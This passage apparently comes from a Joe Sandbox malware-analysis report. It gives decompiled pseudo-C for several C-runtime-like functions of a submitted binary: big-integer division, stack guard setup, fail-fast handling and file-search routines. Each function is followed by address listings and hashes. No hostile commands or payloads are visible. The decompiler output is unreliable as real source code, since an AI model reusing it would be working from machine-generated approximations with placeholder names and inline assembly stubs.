																_v1556 = 0;
																 *((intOrPtr*)(_a4 + 4 + (_v1404 + _v1468) * 4)) = _v1560;
																_v1528 = E009CEEF0(_v1560, 0x20, _v1556);
																_t453 = _v1468 + 1;
																__eflags = _t453;
																_v1468 = _t453;
															}
															_t554 = _v1416 - 1;
															__eflags = _t554;
															asm("sbb edx, 0x0");
															_v1416 = _t554;
														} else {
															__eflags = _v1576 - _v1428;
															if(_v1576 < _v1428) {
																goto L69;
															}
														}
													}
													_v1420 = _v1404 + _v1408 - 1;
												} else {
													__eflags = _v1416;
													if(_v1416 > 0) {
														goto L60;
													}
												}
												_t650 = _v1520;
												_t442 = E009CEC00(_v1524, 0x20, _t650);
												asm("adc edx, ecx");
												_v1524 = _t442 + _v1416;
												_v1520 = _t650;
												continue;
											}
											goto L51;
										}
										_v1508 = _v1420 + 1;
										while(1) {
											__eflags = _v1508 -  *_a4;
											if(_v1508 >=  *_a4) {
												break;
											}
											 *((intOrPtr*)(_a4 + 4 + _v1508 * 4)) = 0;
											_t426 = _v1508 + 1;
											__eflags = _t426;
											_v1508 = _t426;
										}
										_t634 = _v1420 + 1;
										__eflags = _t634;
										 *_a4 = _t634;
										while(1) {
											__eflags =  *_a4;
											if( *_a4 == 0) {
												break;
											}
											_t421 =  *_a4;
											_t534 = _a4;
											__eflags =  *(_t534 + _t421 * 4);
											if( *(_t534 + _t421 * 4) == 0) {
												 *_a4 =  *_a4 - 1;
												continue;
											}
											break;
										}
										_t419 = _v1524;
										_t635 = _v1520;
									} else {
										_t419 = 0;
										_t635 = 0;
									}
									goto L85;
								}
								_v1456 = _v1456 + 1;
								goto L35;
							} else {
								_t419 = 0;
								_t635 = 0;
							}
						} else {
							_v1480 = _a8[1];
							__eflags = _v1480 - 1;
							if(_v1480 != 1) {
								__eflags = _v1420;
								if(_v1420 != 0) {
									_v1516 = 0;
									_v1512 = 0;
									_v1452 = 0;
									_v1448 = 0;
									_v1492 = _v1420;
									while(1) {
										__eflags = _v1492 - 0xffffffff;
										if(_v1492 == 0xffffffff) {
											break;
										}
										_t697 = _v1448;
										_v1452 = E009CEC00(_v1452, 0x20, _t697) |  *(_a4 + 4 + _v1492 * 4);
										_v1448 = _t697;
										_t699 = _v1512;
										_t496 = E009CEC00(_v1516, 0x20, _t699);
										_t498 = E009CEC20(_v1452, _v1448, _v1480, 0);
										asm("adc edi, ecx");
										_v1516 = _t496 + _t498;
										_v1512 = _t699;
										_t703 = _v1452;
										_v1452 = E009CEC90(_t703, _v1448, _v1480, 0);
										_v1448 = _t703;
										_t607 = _v1492 - 1;
										__eflags = _t607;
										_v1492 = _t607;
									}
									E009BAAB0(_a4, E009BA9F0( &_v472));
									_a4[0x2eb6ec] = E009CEEF0(_v1452, 0x20, _v1448);
									_a4[1] = _v1452;
									_t491 = _a4;
									__eflags =  *(_t491 + 0xbadbb1);
									if( *(_t491 + 0xbadbb1) <= 0) {
										_v1552 = 1;
									} else {
										_v1552 = 2;
									}
									 *_a4 = _v1552;
									_t419 = _v1516;
									_t635 = _v1512;
								} else {
									_v1544 = _a4[1];
									E009BAAB0(_a4, E009BA9F0( &_v936));
									_a4[1] = _v1544 % _v1480;
									_t508 = _a4;
									__eflags =  *(_t508 + 4);
									if( *(_t508 + 4) <= 0) {
										_v1548 = 0;
									} else {
										_v1548 = 1;
									}
									 *_a4 = _v1548;
									_t419 = _v1544 / _v1480;
									_t635 = 0;
								}
							} else {
								_v1580 = _a4[1];
								E009BAAB0(_a4, E009BA9F0( &_v1400));
								_t635 = 0;
								_t419 = _v1580;
							}
						}
					} else {
						__eflags = 0;
						if(0 == 0) {
							_t514 = L00994930(0, 2, L"minkernel\\crts\\ucrt\\inc\\corecrt_internal_big_integer.h", 0x2da, 0, L"%ls", L"(\"Division by zero\", false)");
							__eflags = _t514 - 1;
							if(_t514 == 1) {
								asm("int3");
							}
						}
						_t419 = 0;
						_t635 = 0;
					}
				} else {
					_t419 = 0;
					_t635 = 0;
				}
				L85:
				_pop(_t714);
				_pop(_t721);
				return E00957280(_t419, _t515, _v8 ^ _t732, _t635, _t714, _t721);
			}

















































































































                      0x009bac80
                      0x009bac83
                      0x009bac85
                      0x009bac8b
                      0x009bac92
                      0x009bac9d
                      0x009bacab
                      0x009bacae
                      0x009baceb
                      0x009bacf6
                      0x009bacf6
                      0x009bacf9
                      0x009bacff
                      0x009baf7f
                      0x009baf85
                      0x009baf99
                      0x009bafab
                      0x009bafb7
                      0x009bafc3
                      0x009bafda
                      0x009bafe0
                      0x009bafe6
                      0x00000000
                      0x00000000
                      0x009bafff
                      0x009bb005
                      0x009bb008
                      0x009bb00e
                      0x009bb011
                      0x009bb015
                      0x009bb019
                      0x009bafd1
                      0x009bafd1
                      0x009bafd4
                      0x00000000
                      0x009bb01b
                      0x009bb021
                      0x009bb027
                      0x009bb02a
                      0x009bb030
                      0x009bb033
                      0x009bb037
                      0x009bb03b
                      0x009bb043
                      0x009bb043
                      0x009bb046
                      0x009bb046
                      0x009bb04c
                      0x009bb053
                      0x009bb053
                      0x009bb05a
                      0x009bb071
                      0x009bb077
                      0x009bb07d
                      0x009bb080
                      0x009bb084
                      0x009bb090
                      0x009bb091
                      0x009bb096
                      0x009bb099
                      0x009bb0aa
                      0x009bb0b0
                      0x009bb0b7
                      0x009bb0d7
                      0x009bb0eb
                      0x009bb0f1
                      0x009bb0f8
                      0x009bb103
                      0x009bb10f
                      0x009bb10f
                      0x009bb115
                      0x009bb115
                      0x009bb0f8
                      0x009bb11b
                      0x009bb125
                      0x009bb135
                      0x009bb13b
                      0x009bb141
                      0x009bb141
                      0x009bb144
                      0x009bb14a
                      0x00000000
                      0x00000000
                      0x009bb15c
                      0x009bb162
                      0x009bb17f
                      0x009bb164
                      0x009bb177
                      0x009bb177
                      0x009bb18f
                      0x009bb1a9
                      0x009bb1af
                      0x009bb1c3
                      0x009bb1dd
                      0x009bb1e3
                      0x009bb1ea
                      0x009bb1f6
                      0x009bb21b
                      0x009bb221
                      0x009bb235
                      0x009bb247
                      0x009bb24a
                      0x009bb267
                      0x009bb267
                      0x009bb26d
                      0x009bb26d
                      0x009bb24a
                      0x009bb290
                      0x009bb296
                      0x009bb2bb
                      0x009bb2c1
                      0x009bb2c7
                      0x009bb2ce
                      0x009bb2d9
                      0x009bb2d9
                      0x009bb2f0
                      0x009bb2fc
                      0x009bb2fc
                      0x009bb302
                      0x009bb308
                      0x009bb30e
                      0x009bb314
                      0x009bb31e
                      0x009bb2d0
                      0x009bb2d0
                      0x009bb2d7
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x009bb328
                      0x009bb328
                      0x009bb328
                      0x009bb32f
                      0x00000000
                      0x00000000
                      0x009bb335
                      0x009bb344
                      0x009bb355
                      0x009bb35c
                      0x009bb36b
                      0x009bb373
                      0x009bb382
                      0x009bb388
                      0x009bb38e
                      0x009bb394
                      0x009bb3a0
                      0x009bb3a6
                      0x009bb3a8
                      0x009bb3b8
                      0x009bb3c7
                      0x009bb3ca
                      0x009bb3e4
                      0x009bb3ea
                      0x009bb3f0
                      0x00000000
                      0x009bb3aa
                      0x009bb3b0
                      0x009bb3b6
                      0x00000000
                      0x00000000
                      0x009bb3b6
                      0x009bb3a8
                      0x009bb337
                      0x009bb337
                      0x009bb33e
                      0x00000000
                      0x00000000
                      0x009bb33e
                      0x00000000
                      0x009bb335
                      0x009bb3fb
                      0x009bb402
                      0x009bb411
                      0x009bb411
                      0x009bb41b
                      0x009bb425
                      0x009bb440
                      0x009bb446
                      0x009bb44c
                      0x00000000
                      0x00000000
                      0x009bb45b
                      0x009bb467
                      0x009bb46e
                      0x009bb473
                      0x009bb47c
                      0x009bb482
                      0x009bb488
                      0x009bb494
                      0x009bb4a0
                      0x009bb4ad
                      0x009bb4b3
                      0x009bb4bf
                      0x009bb4c5
                      0x009bb4cc
                      0x009bb4d2
                      0x009bb4da
                      0x009bb4da
                      0x009bb4e3
                      0x009bb4e6
                      0x009bb4ec
                      0x009bb51a
                      0x009bb437
                      0x009bb437
                      0x009bb43a
                      0x009bb43a
                      0x009bb52b
                      0x009bb531
                      0x009bb53d
                      0x009bb543
                      0x009bb549
                      0x009bb55d
                      0x009bb55d
                      0x009bb567
                      0x009bb582
                      0x009bb588
                      0x009bb58e
                      0x00000000
                      0x00000000
                      0x009bb5b0
                      0x009bb5b4
                      0x009bb5be
                      0x009bb5c0
                      0x009bb5c6
                      0x009bb5e1
                      0x009bb5f8
                      0x009bb579
                      0x009bb579
                      0x009bb57c
                      0x009bb57c
                      0x009bb609
                      0x009bb609
                      0x009bb612
                      0x009bb615
                      0x009bb54b
                      0x009bb551
                      0x009bb557
                      0x00000000
                      0x00000000
                      0x009bb557
                      0x009bb549
                      0x009bb631
                      0x009bb404
                      0x009bb404
                      0x009bb40b
                      0x00000000
                      0x00000000
                      0x009bb40b
                      0x009bb63d
                      0x009bb645
                      0x009bb652
                      0x009bb654
                      0x009bb65a
                      0x00000000
                      0x009bb65a
                      0x00000000
                      0x009bb2ce
                      0x009bb66e
                      0x009bb685
                      0x009bb68e
                      0x009bb690
                      0x00000000
                      0x00000000
                      0x009bb69b
                      0x009bb67c
                      0x009bb67c
                      0x009bb67f
                      0x009bb67f
                      0x009bb6ab
                      0x009bb6ab
                      0x009bb6b1
                      0x009bb6b3
                      0x009bb6b6
                      0x009bb6b9
                      0x00000000
                      0x00000000
                      0x009bb6be
                      0x009bb6c0
                      0x009bb6c3
                      0x009bb6c7
                      0x009bb6d4
                      0x00000000
                      0x009bb6d4
                      0x00000000
                      0x009bb6c7
                      0x009bb6d8
                      0x009bb6de
                      0x009bb05c
                      0x009bb05c
                      0x009bb05e
                      0x009bb05e
                      0x00000000
                      0x009bb05a
                      0x009baff1
                      0x00000000
                      0x009baf87
                      0x009baf87
                      0x009baf89
                      0x009baf89
                      0x009bad05
                      0x009bad14
                      0x009bad1a
                      0x009bad21
                      0x009bad59
                      0x009bad60
                      0x009badf4
                      0x009badfe
                      0x009bae08
                      0x009bae12
                      0x009bae22
                      0x009bae39
                      0x009bae39
                      0x009bae40
                      0x00000000
                      0x00000000
                      0x009bae4c
                      0x009bae6a
                      0x009bae70
                      0x009bae7c
                      0x009bae84
                      0x009baea5
                      0x009baeae
                      0x009baeb0
                      0x009baeb6
                      0x009baecd
                      0x009baed9
                      0x009baedf
                      0x009bae30
                      0x009bae30
                      0x009bae33
                      0x009bae33
                      0x009baef9
                      0x009baf1c
                      0x009baf31
                      0x009baf3d
                      0x009baf40
                      0x009baf45
                      0x009baf53
                      0x009baf47
                      0x009baf47
                      0x009baf47
                      0x009baf66
                      0x009baf68
                      0x009baf6e
                      0x009bad66
                      0x009bad75
                      0x009bad8a
                      0x009bada8
                      0x009badb4
                      0x009badb7
                      0x009badbc
                      0x009badca
                      0x009badbe
                      0x009badbe
                      0x009badbe
                      0x009baddd
                      0x009bade7
                      0x009baded
                      0x009baded
                      0x009bad23
                      0x009bad32
                      0x009bad47
                      0x009bad4c
                      0x009bad4e
                      0x009bad4e
                      0x009bad21
                      0x009bacb0
                      0x009bacb0
                      0x009bacb2
                      0x009baccc
                      0x009bacd4
                      0x009bacd7
                      0x009bacd9
                      0x009bacd9
                      0x009bacd7
                      0x009bacda
                      0x009bacdc
                      0x009bacdc
                      0x009bac9f
                      0x009bac9f
                      0x009baca1
                      0x009baca1
                      0x009bb6e4
                      0x009bb6e4
                      0x009bb6e5
                      0x009bb6f3

                      Strings
                      • %ls, xrefs: 009BACB9
                      • ("Division by zero", false), xrefs: 009BACB4
                      • minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h, xrefs: 009BACC5
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$("Division by zero", false)$minkernel\crts\ucrt\inc\corecrt_internal_big_integer.h
                      • API String ID: 0-226933
                      • Opcode ID: 0a1d24179e7e9e2d813eac419cac6faae416786f34d4229e627e481f2fe24308
                      • Instruction ID: d285ca53b6c859057806ccaa624b6ca5cd6c9adad29d07595a139086a45b23f8
                      • Opcode Fuzzy Hash: 0a1d24179e7e9e2d813eac419cac6faae416786f34d4229e627e481f2fe24308
                      • Instruction Fuzzy Hash: 0C629A74A04928CFDB64CF18CD94BAAB7B2BB88316F1081D9D84DA7385DB756E81CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00956AF9 Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 41%
                      			E00956AF9() {
				int _t1;
				intOrPtr _t2;
				void* _t4;
				intOrPtr _t9;
				void* _t13;
				intOrPtr* _t16;

				_t1 = IsProcessorFeaturePresent(0xc);
				if(_t1 != 0) {
					_t16 =  *[fs:0x30] + 0x34;
					_t2 =  *_t16;
					if(_t2 != 0) {
						L7:
						 *0xb30208 = _t2;
						_t4 = 1;
					} else {
						_t4 = HeapAlloc(GetProcessHeap(), 8, 8);
						_t13 = _t4;
						if(_t13 != 0) {
							__imp__InitializeSListHead(_t13);
							asm("lock cmpxchg [esi], ecx");
							if(0 != 0) {
								HeapFree(GetProcessHeap(), 0, _t13);
							}
							_t2 =  *_t16;
							goto L7;
						}
					}
					return _t4;
				} else {
					_t9 = _t1 + 1;
					 *0xb30208 = _t9;
					return _t9;
				}
			}









                      0x00956afb
                      0x00956b03
                      0x00956b14
                      0x00956b18
                      0x00956b1c
                      0x00956b5a
                      0x00956b5a
                      0x00956b61
                      0x00956b1e
                      0x00956b29
                      0x00956b2f
                      0x00956b33
                      0x00956b36
                      0x00956b40
                      0x00956b46
                      0x00956b52
                      0x00956b52
                      0x00956b58
                      0x00000000
                      0x00956b58
                      0x00956b33
                      0x00956b64
                      0x00956b05
                      0x00956b05
                      0x00956b06
                      0x00956b0b
                      0x00956b0b

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000C,009569F5,00000000,?,00956BAD,?,?,00944CBB), ref: 00956AFB
                      • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956B22
                      • HeapAlloc.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956B29
                      • InitializeSListHead.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956B36
                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00956BAD,?,?,00944CBB), ref: 00956B4B
                      • HeapFree.KERNEL32(00000000,?,00956BAD,?,?,00944CBB), ref: 00956B52
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                      • String ID:
                      • API String ID: 1475849761-0
                      • Opcode ID: 9ac9f34b92a21ed73976ea8b29c28b3046cc8f7d21d5c3d2b14fff83bd3291c3
                      • Instruction ID: f3ff984d72d8fac6882d1335b92862c5098e3a74b763feb56511d1a85656dd25
                      • Opcode Fuzzy Hash: 9ac9f34b92a21ed73976ea8b29c28b3046cc8f7d21d5c3d2b14fff83bd3291c3
                      • Instruction Fuzzy Hash: 91F04F756A96019BDB509F7AEC0CB1677A8BF95B17F10442AEA82D3250EB3088459760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0096B663 Relevance: 6.1, APIs: 4, Instructions: 84memoryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 94%
                      			E0096B663(void* __edx) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				struct _MEMORY_BASIC_INFORMATION _v52;
				struct _SYSTEM_INFO _v88;
				void* _v100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t20;
				void* _t22;
				char _t24;
				long _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				signed int _t44;
				long _t46;
				char _t47;
				signed int _t50;
				void* _t51;

				_t41 = __edx;
				_t18 =  *0xa0600c; // 0x5d529087
				_v8 = _t18 ^ _t50;
				_t20 = 4;
				E009CED10(_t20);
				_t22 = _t51;
				_v16 = _t22;
				if(VirtualQuery(_t22,  &_v52, 0x1c) == 0) {
					L12:
					_t24 = 0;
				} else {
					_v20 = _v52.AllocationBase;
					GetSystemInfo( &_v88);
					_t37 = _v88.dwPageSize;
					_t47 = 0;
					_v12 = 0;
					if(E009A4000( &_v12) != 0 && _v12 > 0) {
						_t47 = _v12;
					}
					_t44 =  ~_t37;
					_t46 = _t47 - 0x00000001 + _t37 & _t44;
					if(_t46 != 0) {
						_t46 = _t46 + _t37;
					}
					_t30 = _t37 + _t37;
					if(_t46 < _t30) {
						_t46 = _t30;
					}
					_t42 = (_t44 & _v16) - _t46;
					if(_t42 < _v20 + _t37 || VirtualAlloc(_t42, _t46, 0x1000, 4) == 0 || VirtualProtect(_t42, _t46, 0x104,  &_v24) == 0) {
						goto L12;
					} else {
						_t24 = 1;
					}
				}
				return E00957280(_t24, _t37, _v8 ^ _t50, _t41, _t42, _t46);
			}



























                      0x0096b663
                      0x0096b66b
                      0x0096b672
                      0x0096b67a
                      0x0096b67b
                      0x0096b680
                      0x0096b689
                      0x0096b694
                      0x0096b714
                      0x0096b714
                      0x0096b696
                      0x0096b699
                      0x0096b6a0
                      0x0096b6a6
                      0x0096b6ac
                      0x0096b6af
                      0x0096b6b9
                      0x0096b6c0
                      0x0096b6c0
                      0x0096b6c6
                      0x0096b6ca
                      0x0096b6cc
                      0x0096b6ce
                      0x0096b6ce
                      0x0096b6d0
                      0x0096b6d5
                      0x0096b6d7
                      0x0096b6d7
                      0x0096b6df
                      0x0096b6e5
                      0x00000000
                      0x0096b70f
                      0x0096b711
                      0x0096b711
                      0x0096b6e5
                      0x0096b729

                      APIs
                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0096B68C
                      • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 0096B6A0
                      • VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004,?,?,?,0000001C), ref: 0096B6F0
                      • VirtualProtect.KERNEL32(?,-00000001,00000104,?,?,?,0000001C), ref: 0096B705
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Virtual$AllocInfoProtectQuerySystem
                      • String ID:
                      • API String ID: 3562403962-0
                      • Opcode ID: ada71e2edff46d8e06081ad044d7f756f9ab949e92b7413c70dc06d407987db8
                      • Instruction ID: 704a97b348411ae0137467768880729f6f56d9e39009175a3589c4f91b5b6373
                      • Opcode Fuzzy Hash: ada71e2edff46d8e06081ad044d7f756f9ab949e92b7413c70dc06d407987db8
                      • Instruction Fuzzy Hash: EB219072E04129ABDB20DFA5DC85AEFB7BCEF84754F040526E906E7141E7309984DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00958A40 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00958A40(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				void* _v5;
				signed char _v6;
				long _v12;
				struct _EXCEPTION_POINTERS _v20;
				intOrPtr _v88;
				char _v96;
				char _v100;
				intOrPtr _v616;
				char* _v620;
				void* _v624;
				intOrPtr _v628;
				char _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				char _v816;
				long _t51;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t59;
				intOrPtr _t64;
				intOrPtr _t65;

				_t65 = __esi;
				_t64 = __edi;
				_t59 = __edx;
				_t53 = __ebx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t54 = _a4;
					asm("int 0x29");
				}
				_push(3);
				E00958D10(_t41);
				_v640 = E0095AF80(_t64,  &_v816, 0, 0x2cc);
				_v644 = _t54;
				_v648 = _t59;
				_v652 = _t53;
				_v656 = _t65;
				_v660 = _t64;
				_v616 = ss;
				_v628 = cs;
				_v664 = ds;
				_v668 = es;
				_v672 = fs;
				_v676 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v816 = 0x10001;
				_v632 = _v0;
				_v620 =  &_v0;
				_v636 =  *((intOrPtr*)( &_v0 - 4));
				E0095AF80(_t64,  &_v100, 0, 0x50);
				_v100 = 0x40000015;
				_v96 = 1;
				_v88 = _v0;
				if(IsDebuggerPresent() != 1) {
					_v5 = 0;
				} else {
					_v5 = 1;
				}
				_v6 = _v5;
				_v20.ExceptionRecord =  &_v100;
				_v20.ContextRecord =  &_v816;
				SetUnhandledExceptionFilter(0);
				_t51 = UnhandledExceptionFilter( &_v20);
				_v12 = _t51;
				if(_v12 == 0 && (_v6 & 0x000000ff) == 0) {
					_push(3);
					return E00958D10(_t51);
				}
				return _t51;
			}


































                      0x00958a40
                      0x00958a40
                      0x00958a40
                      0x00958a40
                      0x00958a53
                      0x00958a55
                      0x00958a58
                      0x00958a58
                      0x00958a5a
                      0x00958a5c
                      0x00958a7a
                      0x00958a80
                      0x00958a86
                      0x00958a8c
                      0x00958a92
                      0x00958a98
                      0x00958a9e
                      0x00958aa5
                      0x00958aac
                      0x00958ab3
                      0x00958aba
                      0x00958ac1
                      0x00958ac8
                      0x00958ac9
                      0x00958acf
                      0x00958adc
                      0x00958ae5
                      0x00958af1
                      0x00958aff
                      0x00958b07
                      0x00958b0e
                      0x00958b18
                      0x00958b24
                      0x00958b2c
                      0x00958b26
                      0x00958b26
                      0x00958b26
                      0x00958b33
                      0x00958b39
                      0x00958b42
                      0x00958b47
                      0x00958b51
                      0x00958b57
                      0x00958b5e
                      0x00958b68
                      0x00000000
                      0x00958b6f
                      0x00958b75

                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00958A4B
                      • IsDebuggerPresent.KERNEL32 ref: 00958B1B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00958B47
                      • UnhandledExceptionFilter.KERNEL32(00000007), ref: 00958B51
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      • Opcode ID: 6aafb3a2e7b820967f87de562c7cbbde226d0a54ffe57a9faa3722e08d9ed108
                      • Instruction ID: d55cb7fed28a6db04624a97bdee1007c9612b5d3e6299528f644f29e7dd56a80
                      • Opcode Fuzzy Hash: 6aafb3a2e7b820967f87de562c7cbbde226d0a54ffe57a9faa3722e08d9ed108
                      • Instruction Fuzzy Hash: E33135B8C193299ADF10DF61D8497DDBBB8AF58301F1081DAE80D6B281EB715A89CF41
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 009ADAE0 Relevance: 4.7, APIs: 3, Instructions: 223filetimeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 98%
                      			E009ADAE0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed char* _a8, intOrPtr _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				signed char* _v604;
				char _v605;
				char _v606;
				char* _v612;
				char _v616;
				char _v617;
				signed int _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				intOrPtr _v636;
				union _FINDEX_INFO_LEVELS _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				char _v680;
				char _v704;
				signed int _t91;
				WCHAR* _t99;
				void* _t102;
				char* _t106;
				char* _t107;
				signed int _t111;
				void* _t117;
				union _FINDEX_INFO_LEVELS _t122;
				intOrPtr _t134;
				signed char* _t144;
				void* _t145;
				char* _t157;
				intOrPtr _t176;
				intOrPtr _t177;
				void* _t210;
				void* _t211;
				signed int _t213;
				signed int _t215;
				void* _t216;
				void* _t217;

				_t211 = __esi;
				_t210 = __edi;
				_t145 = __ebx;
				_t213 = _t215;
				_t216 = _t215 - 0x2bc;
				_t91 =  *0xa0600c; // 0x5d529087
				_v8 = _t91 ^ _t213;
				_v617 = 0;
				_v604 = _a8;
				while(_v604 != _a4 && (E009AE610( &_v605,  *_v604 & 0x000000ff) & 0x000000ff) == 0) {
					_t144 = E009AEEC0(_a4, _v604);
					_t216 = _t216 + 8;
					_v604 = _t144;
				}
				__eflags =  *_v604 - 0x3a;
				if( *_v604 != 0x3a) {
					L8:
					__eflags = E009AE610( &_v605,  *_v604 & 0x000000ff) & 0x000000ff;
					if(__eflags == 0) {
						_v628 = 0;
					} else {
						_v628 = _v604 - _a4 + 1;
					}
					_v644 = _v628;
					E009AE3B0( &_v704);
					_t99 = E009AEE80(_t145, _a4, _t211, __eflags,  &_v704, _a4);
					_t217 = _t216 + 8;
					E009AE340( &_v616, FindFirstFileExW(_t99, 0,  &_v600, 0, 0, 0));
					_t102 = E009AEDF0( &_v616);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_v624 = E009AEFB0(_a12);
						do {
							E009AE360( &_v680);
							_t106 = E009AEE10(_t145,  &_v680, _t211, __eflags,  &_v680,  &(_v600.cFileName));
							_t217 = _t217 + 8;
							_v612 = _t106;
							_t107 = _v612;
							__eflags =  *_t107 - 0x2e;
							if( *_t107 != 0x2e) {
								L17:
								_t157 = _v612;
								__eflags =  *_t157 - 0x2e;
								if( *_t157 != 0x2e) {
									L21:
									_t111 = E009AD8A0(_v644, _t210, _v612, _a4, _v644, _a12);
